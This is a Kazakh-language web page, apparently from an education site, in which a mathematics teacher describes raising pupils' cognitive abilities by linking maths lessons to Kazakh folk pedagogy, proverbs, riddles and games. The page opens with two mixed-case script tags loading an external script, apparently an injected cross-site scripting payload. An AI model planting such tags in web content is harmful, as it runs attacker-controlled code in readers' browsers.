<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.04.2018

XX ғасырдың

басында Жүсіпбек Аймауытов: «Сабақ беру – үйреншікті жай ғана шеберлік емес, ол

жаңадан жаңаны табатын өнер» деген екен. Ұстаздық өмірдегі тәжірибемде оқыту

барысында алдыма қойған мақсатым – оқушыны 

оқу ісіне өзінше қызықтыратын, оған қабілетін арттыратын жағдай туғызу,

ойлау дағдыларын жетілдіру, сол үшін өзіме әдістемелік тақырып қылып

«Оқушылардың  математика сабағында

танымдық қабілеттерін  арттыру» - деп

алдым. Осы мақсатпен оқушының ойлау қабілетін дамыту негізгі ұстанымым болып

табылмақ.

Математикалық білім беру жалпы адамзаттық мәдениетті қалыптастыруда өзіндік

үлесін қосады. Сонымен қатар , халықтың мәдени, салт-тұрмыстық әдептерімен

математиканы ұштастыра оқыту математикалық негізі  бар халықтық мәдениеттін элементтерін ескеру

болып табылады. Әр оқушының қалыптасып дамуында,

өздері күнбе – күн өмірден сезілетін, еститін, көретін заттары мен құбылыстары,

оқиғалары үлкен орын алады. Соның ең негізгісі – қазақтың халықтық

педагогикасы. Қазақ халқының сан ғасырлар бойы жинақтаған мол тәжірибесін,

танымдық мұрасы, салт – дәстүр, әдеп – ғұрып, аңыз ертегілері, жұмбақ, мақал –

мәтелдер, өлең – жырлары, ұлттық ойындары ерекше тәрбиелік мәні бар баға жетпес

қазына.Осы арқылы бала бойында математикалық ілім–білімге тән

ынталылық, қызығушылық, логикалық ойлай білу, ықшамдылық, сапалылық, үнемшілдік

қалыптасады.

Просмотров: 803

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу